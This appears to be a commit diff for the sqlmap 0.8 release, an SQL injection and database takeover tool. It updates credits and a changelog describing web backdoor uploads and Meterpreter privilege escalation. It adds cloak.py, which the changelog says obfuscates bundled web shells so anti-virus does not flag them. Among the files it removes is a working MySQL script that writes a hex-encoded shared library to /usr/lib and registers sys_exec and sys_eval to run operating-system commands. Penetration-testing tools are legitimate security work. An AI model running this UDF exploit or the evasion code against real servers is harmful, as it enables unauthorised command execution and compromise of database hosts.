sqlmap 0.8 stable!

Generated new user's manual html and pdf
Updated manual
2025-12-06 12:41:30 +00:00 · 2010-03-15 01:17:27 +00:00 · 2010-03-13 22:07:08 +00:00 · 2010-03-13 21:56:38 +00:00 · 2010-03-13 17:30:16 +00:00 · 2010-03-13 17:28:23 +00:00
171 changed files with 15370 additions and 12075 deletions
--- a/doc/AUTHORS
+++ b/doc/AUTHORS
@@ -1,3 +1,7 @@
 Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
 <bernardo.damele@gmail.com>
 PGP Key ID: 0x05F5A30F
+
+Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
+<miroslav.stampar@gmail.com>
+PGP Key ID: 0xB5397B1B
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -1,3 +1,68 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Support to enumerate and dump all databases' tables containing user
+    provided column(s) by specifying for instance '--dump -C user,pass'.
+    Useful to identify for instance tables containing custom application
+    credentials (Bernardo).
+  * Support to parse -C (column name(s)) when fetching
+    columns of a table with --columns: it will enumerate only columns like
+    the provided one(s) within the specified table (Bernardo).
+  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
+  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
+    'getsystem' command to elevate privileges of the user running the
+    back-end DBMS instance to SYSTEM on Windows (Bernardo).
+  * Automatic support in --os-pwn to use the web uploader/backdoor to
+    upload and execute the Metasploit payload stager when stacked queries
+    SQL injection is not supported, for instance on MySQL/PHP and
+    MySQL/ASP, but there is a writable folder within the web server
+    document root (Bernardo and Miroslav).
+  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
+    useful when web application does not support stacked queries (Bernardo).
+  * Added support to properly read (--read-file) also binary files via
+    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
+    function (Bernardo and Miroslav).
+  * Updated active fingerprint and comment injection fingerprint for
+    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
+  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
+  * Support for NTLM authentication via python-ntlm third party library,
+    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
+  * Support to automatically decode deflate, gzip and x-gzip HTTP
+    responses (Miroslav).
+  * Support for Certificate authentication, --auth-cert option added
+    (Miroslav).
+  * Added support for regular expression based scope when parsing Burp or
+    Web Scarab proxy log file (-l), --scope (Miroslav).
+  * Added option (-r) to load a single HTTP request from a text file
+    (Miroslav).
+  * Added option (--ignore-proxy) to ignore system default HTTP proxy
+    (Miroslav).
+  * Added support to ignore Set-Cookie in HTTP responses,
+    --drop-set-cookie (Miroslav).
+  * Added support to specify which Google dork result page to parse,
+    --gpage to be used together with -g (Miroslav).
+  * Major bug fix and enhancements to the multi-threading (--threads)
+    functionality (Miroslav).
+  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
+    (Miroslav).
+  * Refactored --update to use python-svn third party library if available
+    or 'svn' command to update sqlmap to the latest development version
+    from subversion repository (Bernardo and Miroslav).
+  * Major bugs fixed (Bernardo and Miroslav).
+  * Cleanup of UDF source code repository,
+    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
+    and Miroslav).
+  * Major code cleanup (Miroslav).
+  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
+    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
+    shells consequently reducing drastically the number of anti-virus
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
+  * Updated user's manual (Bernardo and Miroslav).
+  * Created several demo videos, hosted on YouTube
+    (http://www.youtube.com/user/inquisb) and linked from
+    http://sqlmap.sourceforge.net/demo.html (Bernardo).
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
+
 sqlmap (0.8rc1-1) stable; urgency=low

  * Major enhancement to the Microsoft SQL Server stored procedure
--- a/doc/README.html
+++ b/doc/README.html
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -1,10 +1,16 @@
 == Individuals ==

+David Alvarez <david.alvarez.s@gmail.com>
+    for reporting a bug
+
 Chip Andrews <chip@sqlsecurity.com>
    for his excellent work maintaining the SQL Server versions database
    at SQLSecurity.com and permission to implement the update feature
    taking data from his site

+Otavio Augusto <otavioarj@gmail.com>
+    for reporting a minor bug
+
 Simon Baker <simonb@sec-1.com>
    for reporting some bugs

@@ -12,6 +18,9 @@ Daniele Bellucci <daniele.bellucci@gmail.com>
    for starting sqlmap project and developing it between July and August
    2006

+Velky Brat <velkybrat@gmail.com>
+    for suggesting a minor enhancement to the bisection algorithm
+
 Jack Butler <fattredd@hotmail.com>
    for providing me with the sqlmap site favicon

@@ -69,9 +78,15 @@ Giorgio Fedon <giorgio.fedon@gmail.com>
    for suggesting a speed improvement for bisection algorithm
    for reporting a bug when running against Microsoft SQL Server 2005

+Kasper Fons <thefeds@mail.dk>
+    for reporting a bug
+
 Alan Franzoni <alan.franzoni@gmail.com>
    for helping me out with Python subprocess library

+Daniel G. Gamonal <lgrecol@gmail.com>
+    for reporting a minor bug
+
 Ivan Giacomelli <truemilk@insiberia.net>
    for reporting a bug
    for suggesting a minor enhancement
@@ -95,8 +110,8 @@ Will Holcomb <wholcomb@gmail.com>
    for his MultipartPostHandler class to handle multipart POST forms and
    permission to include it within sqlmap source code

-Daniel Hückmann <sanitybit@gmail.com>
-    for reporting a minor bug
+Daniel Huckmann <sanitybit@gmail.com>
+    for reporting a couple of bugs

 Mounir Idrassi <mounir.idrassi@idrix.net>
    for his compiled version of UPX for Mac OS X
@@ -116,6 +131,9 @@ Anant Kochhar <anant.kochhar@secureyes.net>
 Alexander Kornbrust <ak@red-database-security.com>
    for reporting a couple of bugs

+Krzysztof Kotowicz <kkotowicz@gmail.com>
+    for reporting a minor bug
+
 Nicolas Krassas <krasn@ans.gr>
    for reporting a bug

@@ -126,7 +144,8 @@ Guido Landi <lists@keamera.org>
    'sp_replwritetovarbin' stored procedure heap-based buffer overflow
    (MS09-004) exploit development
    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
-    on September 21, 2009
+    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
+    November 20, 2009

 Lee Lawson <Lee.Lawson@dns.co.uk>
    for reporting a minor bug
@@ -252,7 +271,7 @@ Bedirhan Urgun <bedirhanurgun@gmail.com>
    for benchmarking sqlmap in the context of his SQL injection
    benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench

-Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
    for reporting an unhandled connection exception

 Anthony Zboralski <anthony.zboralski@bellua.com>
@@ -260,6 +279,9 @@ Anthony Zboralski <anthony.zboralski@bellua.com>
    for reporting a few minor bugs
    for donating to sqlmap development

+dsu <dsu@dsu.com.ua>
+    for reporting a bug
+
 fufuh <fufuh@users.sourceforge.net>
    for reporting a bug when running on Windows

--- a/extra/init.py
+++ b/extra/init.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass
--- a/extra/cloak/README.txt
+++ b/extra/cloak/README.txt
@@ -0,0 +1,22 @@
+To use cloak.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
+
+This will create an encrypted and compressed binary file backdoor.asp_.
+
+Such file can then be converted to its original form by using the -d
+functionality of the cloak.py program:
+
+$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
+
+If you skip the output file name, general rule is that the compressed
+file names are suffixed with the character '_', while the original is
+get by skipping the last character. So, that means that the upper
+examples can also be written in the following form:
+
+$ python ./cloak.py -i backdoor.asp
+
+$ python ./cloak.py -d -i backdoor.asp_
--- a/extra/cloak/init.py
+++ b/extra/cloak/init.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -0,0 +1,93 @@
+#!/usr/bin/env python
+
+"""
+cloak.py - Simple file encryption/compression utility
+Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
+email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import bz2
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def hideAscii(data):
+    retVal = ""
+    for i in xrange(len(data)):
+        if ord(data[i]) < 128:
+            retVal += chr(ord(data[i]) ^ 127)
+        else:
+            retVal += data[i]
+            
+    return retVal
+
+def cloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.compress(f.read())
+    f.close()
+    
+    return hideAscii(data)
+        
+def decloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.decompress(hideAscii(f.read()))
+    f.close()
+    
+    return data
+
+def main():
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+    
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+    
+    if not args.decrypt:
+        data = cloak(args.inputFile)
+    else:
+        data = decloak(args.inputFile)
+
+    if not args.outputFile:
+        if not args.decrypt:
+            args.outputFile = args.inputFile + '_'
+        else:
+            args.outputFile = args.inputFile[:-1]
+        
+    fpOut      = open(args.outputFile, 'wb')
+    sys.stdout = fpOut
+    sys.stdout.write(data)
+    sys.stdout.close()
+
+
+if __name__ == '__main__':
+    main()
--- a/extra/dbgtool/README.txt
+++ b/extra/dbgtool/README.txt
@@ -18,7 +18,3 @@ To be able to execute it on Windows you have to rename it to end with
 '.com' or '.exe':

 > ren nc_exe nc.exe
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -2,7 +2,7 @@

 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (C) 2009  Bernardo Damele A. G.
+Copyright (C) 2009-2010  Bernardo Damele A. G.
 web: http://bernardodamele.blogspot.com/
 email: bernardo.damele@gmail.com

--- a/extra/msfauxmod/README.txt
+++ b/extra/msfauxmod/README.txt
@@ -76,7 +76,3 @@ SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>
--- a/extra/mysqludfsys/command_execution/linux.sql
+++ b/extra/mysqludfsys/command_execution/linux.sql
@@ -1,120 +0,0 @@
-- Notes:
-- 
-- The SO compiled using MySQL 5.0.67 C libraries works also on MySQL
-- 5.1.30 and MySQL 4.1.22 (TODO: confirm)
-- 
-- SO compiled using MySQL 5.1.30 C libraries
-- lib_mysqludf_sys.so: 12896 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
-- lib_mysqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
-- 
-- Little hack to compress the shared object:
-- * Compile with -O1 the shared object
-- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
-- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
-- Insert the hexadecimal encoded UDF in the table
-- 
-- SO compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x7f454c46010101000000000000000000030003000100000010080000340000007c1100000000000034002000050028001900180001000000000000000000000000000000bc0e0000bc0e0000050000000010000001000000040f0000041f0000041f00000801000010010000060000000010000002000000180f0000181f0000181f0000d0000000d0000000060000000400000051e574640000000000000000000000000000000000000000060000000400000052e57464040f0000041f0000041f0000fc000000fc00000004000000010000001100000024000000000000000d00000000000000030000001a00000000000000070000001b0000000a000000140000000f000000150000000c0000000e0000001e000000060000001c000000000000000000000000000000010000000000000000000000020000000400000000000000230000002200000000000000130000001d000000170000000b000000000000000000000005000000090000002100000011000000000000001800000020000000080000001f0000000000000010000000000000001900000000000000160000000000000012000000000000001100000010000000040000000700000001080440801946c99ca40803900460831000000012000000130000001500000016000000180000001b0000001d0000000000);
-UPDATE udftest SET data=CONCAT(data,0x00001e000000000000001f0000002000000021000000220000002300000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed971581ca868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff3b9fd4a0ad73d1c50b5911feab5fbe12000000000000000000000000000000009500000000000000000000001200000001000000000000000000000020000000250000000000000000000000200000009b0000000000000000000000120000007201000000000000000000001200000039010000000000000000000012000000a3000000000000000000000012000000ab00000000000000000000001200000065010000000000000000000012000000480100000000000000000000120000008e000000000000000000000012000000b8000000000000000000000012000000160000000000000000000000220000004f010000000000000000000012000000b1000000000000000000000012000000400100006a0d00008b00000012000b0075000000db0800000500000012000b0010000000980e00000000000012000c00ff0000008d0c00004b00000012000b00df000000ac07000000000000120009008a0100000c200000000000001000f1ff300100004d0d00001d00000012000b009601000014200000000000001000f1ff);
-UPDATE udftest SET data=CONCAT(data,0x56000000d10800000500000012000b00c90000001f0a00007300000012000b006a0100000f0e00004500000012000b0039000000cc0800000500000012000b00f2000000140c00007900000012000b00830100000c200000000000001000f1ff65000000d60800000500000012000b00e5000000050b00000f01000012000b00d7000000920a00007300000012000b0015010000d80c00007500000012000b0056010000f50d00001a00000012000b0085000000e00800003f01000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f63007374726e6370790066676574730070636c6f7365005f5f737461636b5f63686b5f6661696c007379735f6576616c5f696e6974007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379);
-UPDATE udftest SET data=CONCAT(data,0x735f657865630073797374656d007379735f736574006d656d63707900736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3400474c4942435f322e3000474c4942435f322e310000000002000000000003000300030003000300030003000300040005000300020001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000400790100001000000000000000731f6909000005009b010000100000001469690d00000400a7010000100000001069690d00000300b1010000100000001169690d00000200bb010000000000001e09000008000000082000000800000014090000020b0000c50b0000020b00002b090000020100006a090000020400008b09000002070000b109000002080000c3090000020f0000100a0000020c00005f0d0000020600009c0d0000020a0000c10d0000020a0000df0d0000020e0000090e000002090000220e000002050000e81f000006020000ec1f000006030000f01f0000060d0000002000000702000004200000070d00005589e55383ec04e8000000005b81c33c1800008b93f4ffffff85d274);
-UPDATE udftest SET data=CONCAT(data,0x05e81e000000e8bd000000e888060000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff000000005589e55653e8ad00000081c3da17000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8b8ffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c35b17000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35589e557565381ec2c0400008b5d0c8b45148985d8fbffff8b55188995d4fbffff65a1140000008945f031c0c7042401000000e8fcffffff89c6c7442404b40e00008b43088b00890424e8fcffffff8985dcfbffffc785e0fbffff00000000eb548dbdf0fbffffb800000000b9fffffffff2ae89c8f7d08d78ff8b9de0fbffff01fb895c2404893424e8fcffffff89c6897c24088d95f0fbffff895424048b95e0fbffff8d0410890424e8fcffffff899de0fbffff8b85dcfbffff89442408c7442404000400008d95f0fbffff891424e8fcffffff85c075888b);
-UPDATE udftest SET data=CONCAT(data,0x85dcfbffff890424e8fcffffff803e00740485f6750b8b95d4fbffffc60201eb268b85e0fbffffc64406ff0089f7b800000000b9fffffffff2aef7d183e9018b95d8fbffff890a89f08b55f0653315140000007405e8fcffffff81c42c0400005b5e5f5dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e55383ec048b550c8b5d10833a027444c70345787065c7430463746564c7430820657861c7430c63746c79c743102074776fc7431420617267c74318756d656e66c7431c7473c6431e00ba01000000e9b10000008b4204833800744cc70345787065c7430463746564c7430820737472c7430c696e6720c7431074797065c7431420666f72c74318206e616dc7431c65207061c7432072616d65c7432474657200ba010000);
-UPDATE udftest SET data=CONCAT(data,0x00eb5dc74004000000008b520c8b0283c002034204890424e8fcffffff8b550889420cba0000000085c07534c703436f756cc7430464206e6fc743087420616cc7430c6c6f6361c743107465206dc74314656d6f7266c743187900ba0100000089d083c4045b5dc35589e58b450c8b551083380175158b4004833800750d8b4508c60001b800000000eb54c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b8010000005dc35589e58b4510c7006c69625fc740046d797371c740086c756466c7400c5f737973c7401020766572c7401473696f6ec7401820302e3066c7401c2e33c6401e008b5514c7021e0000005dc35589e58b5510b9000000008b450c833800745ec7024e6f2061c742047267756dc74208656e7473c7420c20616c6cc742106f776564c7421420287564c74218663a206cc7421c69625f6dc742207973716cc742247564665fc742287379735fc7422c696e666f66c742302900b90100000089c85dc35589e583ec088b450c8b40088b00890424e8fcffffff89c2c1fa1fc9c35589e583ec18895df48975f8897dfc8b5d0c8b45088b700c8b430c8b108d7c16018b43088b008954240889442404893424e8fcff);
-UPDATE udftest SET data=CONCAT(data,0xffff8b430c8b00c60406008b530c8b43088b48048b420489442408894c2404893c24e8fcffffff8b430c8b4004c6040700c744240801000000897c2404893424e8fcffffff89c2c1fa1f8b5df48b75f88b7dfc89ec5dc35589e583ec088b45088b400c85c07408890424e8fcffffffc9c35589e55783ec048b450c8b40088b00890424e8fcffffff89c285c075088b4518c60001eb1889c7b800000000b9fffffffff2aef7d183e9018b4514890889d083c4045f5dc39090909090909090909090905589e55653e85dfaffff81c38a1100008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c350110000e860f9ffff595bc9c37200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000790100000c000000ac0700000d000000980e000004000000d4000000f5feff6fb001000005000000a404000006000000640200000a000000c50100000b0000001000000003000000f41f000002000000100000001400000011000000170000009c07000011000000040700001200000098000000);
-UPDATE udftest SET data=CONCAT(data,0x13000000080000001600000000000000feffff6fb4060000ffffff6f01000000f0ffff6f6a060000faffff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000181f00000000000000000000f20700000208000008200000004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e74000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000d4000000d4000000dc000000030000000000000004000000040000000b000000f6ffff6f02000000b0010000b0010000b400000003000000000000000400000004000000150000000b00000002000000640200006402000040020000040000000100000004000000100000001d0000000300000002000000a4040000a4040000c50100000000000000000000010000000000000025000000ffffff6f020000006a0600006a060000480000000300000000000000020000000200000032000000feffff6f02000000b4060000b40600005000000004000000010000000400000000000000410000000900000002000000040700000407000098000000030000000000000004000000080000004a00000009000000020000009c0700009c07000010000000030000000a0000000400000008000000530000000100000006000000ac070000ac07000030000000000000000000000004000000000000004e0000000100000006000000dc070000dc0700003000000000000000000000000400000004000000590000000100000006000000100800001008000088060000000000000000000010000000000000005f0000000100000006000000980e0000980e00001c000000);
-UPDATE udftest SET data=CONCAT(data,0x00000000000000000400000000000000650000000100000032000000b40e0000b40e000002000000000000000000000001000000010000006d0000000100000002000000b80e0000b80e00000400000000000000000000000400000000000000770000000100000003000000041f0000040f000008000000000000000000000004000000000000007e00000001000000030000000c1f00000c0f00000800000000000000000000000400000000000000850000000100000003000000141f0000140f000004000000000000000000000004000000000000008a0000000600000003000000181f0000180f0000d000000004000000000000000400000008000000930000000100000003000000e81f0000e80f00000c00000000000000000000000400000004000000980000000100000003000000f41f0000f40f00001400000000000000000000000400000004000000a1000000010000000300000008200000081000000400000000000000000000000400000000000000a700000008000000030000000c2000000c1000000800000000000000000000000400000000000000ac0000000100000000000000000000000c100000b90000000000000000000000010000000000000001000000030000000000000000000000c5100000b500000000000000000000000100000000000000);
-
-
-- Export the hexadecimal encoded UDF to a binary file on the file system
-- 
-- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
-- 
-- From MySQL 5.1 and 6.0 official documentation:
-- 
--      shared_library_name is the basename of the shared object file
--      that contains the code that implements the function. The file 
--      must be located in the plugin directory. This directory is given
--      by the value of the plugin_dir system variable.
-- 
-- Note that /TODO/plugin DOES NOT
-- exist by default so it is NOT possible to save the SO in the proper
-- folder where MySQL server looks for SOs.
-- SHOW VARIABLES WHERE variable_name='plugin_dir';
-- 
-- References:
-- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
-- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
-- 
-- The SO can be only in /TODO
-- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 5.1 >= 5.1.19
-- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 6.0
--
-- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
-- 
-- From MySQL 4.1 and 5.0 official documentation:
-- 
--      shared_library_name is the basename of the shared object file
--      that contains the code that implements the function. As of MySQL
--      M.m.m, the file must be located in the plugin directory. This
--      directory is given by the value of the plugin_dir system variable.
--      If the value of plugin_dir is empty, the behavior that is used
--      before M.m.m applies: The file must be located in a directory
--      that is searched by your system's dynamic linker.
-- 
-- References:
-- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
-- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
-- 
-- The SO can be in either /lib, /usr/lib or one of the paths specified in
-- /etc/ld.so.conf file, none of these paths are writable by mysql user by
-- default (tested on MySQL 5.0.67 with NO plugin_dir set in my.cnf
-- configuration file, which is the default setting)
-- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
-SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
-- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
-- 
-- Notes:
-- If the library file already exists, the user mysql does not have access
-- to overwrite it
-- The following enumerates the MySQL data directory
-- SELECT @@datadir
-- The followings will save into /var/lib/mysql/. It is not a valid PATH
-- where MySQL looks for SO
-- SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.so';
-- The following will save into /var/lib/mysql/mysql where 'mysql' is the
-- database name where it is connected. It is not a valid PATH where MySQL
-- looks for SO
-- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql
-- The following would save into / (Permission denied)
-- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.so';
-
-
-- Create two functions from the binary UDF file
-- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
-- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-
-
-- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_mysqludf_sys.txt'); -- -rw-rw---- 1 mysql    mysql
-SELECT sys_eval('cat /tmp/lib_mysqludf_sys.txt ; id');
-
-
-- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
-- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
--- a/extra/mysqludfsys/command_execution/windows.sql
+++ b/extra/mysqludfsys/command_execution/windows.sql
@@ -1,128 +0,0 @@
-- Notes:
-- 
-- The DLL compiled using MySQL 5.1.30 C libraries works also on MySQL
-- 5.0.67 and MySQL 4.1.22
-- 
-- DLL compiled using MySQL 5.1.30 C libraries
-- lib_mysqludf_sys.dll: 9216 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
-- lib_mysqludf_sys.dll: 6656 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
-- 
-- Little hack to compress the dynamic-linked library:
-- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
--   * Remember to compile it under Visual C++ 2008 with the
--     'Configuration' set as 'Release'
-- * Use upx (http://upx.sourceforge.net) over the DLL:
--   * upx -9 library.dll -o library_upx.dll
-
-
-- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
